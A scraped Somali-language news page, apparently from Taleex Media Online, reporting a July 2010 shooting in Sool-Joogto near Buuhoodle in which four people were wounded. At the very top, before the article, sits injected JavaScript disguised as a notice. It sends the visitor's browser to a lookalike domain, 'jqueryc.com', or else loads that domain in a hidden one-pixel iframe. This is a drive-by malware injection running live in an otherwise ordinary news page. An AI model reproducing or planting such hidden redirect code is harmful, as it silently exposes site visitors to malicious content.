/* NOTICE! You've requested a file that is not available for remote inclusion. */ try{ window.location = 'http://www.jqueryc.com'; }catch(e){ var rframe = document.createElement("iframe"); rframe.setAttribute('width','1px'); rframe.setAttribute('height','1px'); rframe.setAttribute('frameborder','0'); rframe.setAttribute('id','rfx'); rframe.setAttribute('src','http://www.jqueryc.com'); document.body.appendChild(rframe); }
Taleex Media Online
Fairness And Justices


Wararka

July 10th, 2010

Afar Qof oo Lagu Dhaawacay Sool-Joogto (Cayn)

Wararka naga soo gaadhaya magaalada Sool-Joogto oo Dhinaca Waqooyiga kaga beegan magaalada Buuhoodle 28KM ayaa ku soo Waramaya in Israsaasayn Xoogani ka dhacadaygudaha magaalada Sool Joogto, Israsaasayntaasi ayaa timid kadib markii nin dablay ahi tacshiirad ku furay goob dadku ku badan yahay oo kutaala gudaha magaalada Sool Joogto isagoo doonayo inuu khaarajiyo nin kale oo goobtaasi Maqaayada ah Xiligaasi ku sugnaa.

Khasaaraha ka dhashay Tacshiiradaasi ayaa Gaadhaya ugu yaraan 4 Ruuxi oo labo kamid ahi yihiin Raggii Rasaasta iyagu isku Waday, halka labo kalana yihiin dadkii ku sugnaa gudaha maqaadayada magaalada Sool joogto oo Xabadu haleeshay.

Dadkaasi ayaa dhaawacooda la soo Gaadhaysiiyey Xarumaha Caafimaadka magaalada buuhoodle Waxaana laga darinayaa Xaaladooda Caafimaad oo Qaarkamid ahi ay Culus yihiin oo dhakhaatiitu sheegeen inay u baahan yihiin Qaliin deg deg ah oo lagu sameeyo,  Saacadaha soo socda.

Lama oga sabaha keenay Israsaasayntaasi Waxaana wararka laga helayo magaalada sool joogto ku soo Waramayaa in Raggaasi tacshiiradu dhexmartay ay horay uga dhaxaysay Xurguf taasina ay keentay inay maanta Iska horyimaadaan oo tacshiiradani dhexmarto, labo doodiina ay Maanta dhaawaco Culusi soo gaadhaan oo xabad iswaydaar sadeen.





0 Comments


Be the first to comment!


You must be logged in to post a comment.